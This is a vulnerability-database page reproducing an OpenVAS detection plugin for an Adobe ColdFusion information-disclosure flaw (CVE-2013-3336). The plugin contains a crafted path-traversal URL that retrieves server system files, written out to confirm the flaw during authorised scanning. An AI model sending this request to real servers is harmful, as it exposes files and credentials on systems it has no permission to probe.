Lucene search
+L

Adobe ColdFusion Information Disclosure Vulnerability (APSB13-13)

🗓️ 10 May 2013 00:00:00Reported by Copyright (C) 2013 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 49 Views

Adobe ColdFusion information disclosure vulnerability (APSB13-13). Attackers can exploit to retrieve server files and sensitive information

Related
Refs
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2013-3336
29 May 201815:50
circl
cisa
CISA
Adobe Releases Security Update for ColdFusion
9 May 201300:00
cisa
nessus
Tenable Nessus
Adobe ColdFusion Multiple Vulnerabilities (APSA13-03)
14 May 201300:00
nessus
nessus
Tenable Nessus
Adobe ColdFusion Authentication Bypass (APSB13-13)
14 May 201300:00
nessus
nessus
Tenable Nessus
Adobe ColdFusion Authentication Bypass (APSB13-13) (intrusive check)
14 May 201300:00
nessus
checkpoint_advisories
Check Point Advisories
Adobe ColdFusion Directory Traversal Information Disclosure (APSA13-03; CVE-2013-3336)
19 May 201300:00
checkpoint_advisories
cve
CVE
CVE-2013-1389
16 May 201310:00
cve
cve
CVE
CVE-2013-3336
9 May 201310:00
cve
cvelist
Cvelist
CVE-2013-1389
16 May 201310:00
cvelist
cvelist
Cvelist
CVE-2013-3336
9 May 201310:00
cvelist
Rows per page
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:adobe:coldfusion";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.103709");
  script_version("2025-04-15T05:54:49+0000");
  script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
  script_tag(name:"creation_date", value:"2013-05-10 11:21:00 +0200 (Fri, 10 May 2013)");
  script_tag(name:"cvss_base", value:"10.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_cve_id("CVE-2013-3336", "CVE-2013-1389");
  script_name("Adobe ColdFusion Information Disclosure Vulnerability (APSB13-13)");
  script_category(ACT_ATTACK);
  script_family("Web application abuses");
  script_copyright("Copyright (C) 2013 Greenbone AG");
  script_dependencies("gb_adobe_coldfusion_http_detect.nasl", "os_detection.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("adobe/coldfusion/http/detected");

  script_xref(name:"URL", value:"https://web.archive.org/web/20210611144530/https://www.adobe.com/support/security/bulletins/apsb13-13.html");
  script_xref(name:"URL", value:"https://helpx.adobe.com/coldfusion/kb/coldfusion-security-hotfix-apsb13-13.html");
  script_xref(name:"URL", value:"https://web.archive.org/web/20210122002649/http://www.securityfocus.com/bid/59773");
  script_xref(name:"URL", value:"https://web.archive.org/web/20210122002649/http://www.securityfocus.com/bid/59849");

  script_tag(name:"summary", value:"Adobe ColdFusion is prone to an information disclosure
  vulnerability.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"impact", value:"Attackers can exploit this issue to retrieve files stored on the
  server and obtain sensitive information. This may aid in launching further attacks.");

  script_tag(name:"solution", value:"Apply the patch from the referenced advisory.");

  script_tag(name:"solution_type", value:"VendorFix");
  script_tag(name:"qod_type", value:"remote_vul");

  exit(0);
}

include("misc_func.inc");
include("traversal_func.inc");
include("http_func.inc");
include("host_details.inc");
include("os_func.inc");
include("http_keepalive.inc");

if(!port = get_app_port(cpe:CPE, service:"www"))
  exit(0);

if(!get_app_location(cpe:CPE, port:port, nofork:TRUE))
  exit(0);

files = traversal_files();

foreach file(keys(files)) {

  url = "/CFIDE/adminapi/customtags/l10n.cfm?attributes.id=it&attributes.file=../../administrator/mail/download.cfm&filename=../../../../../../../../../../../../../../../" +
        files[file] + "&attributes.locale=it&attributes.var=it&attributes.jscript=false&attributes.type=text/html&attributes.charset=UTF-8&thisTag.executionmode=end&thisTag.generatedContent=htp";
  if(http_vuln_check(port:port, url:url, pattern:file)) {
    report = http_report_vuln_url(port:port, url:url);
    security_message(port:port, data:report);
    exit(0);
  }
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2025 00:00Current
6Medium risk
Vulners AI Score6
CVSS 210
EPSS0.74265
49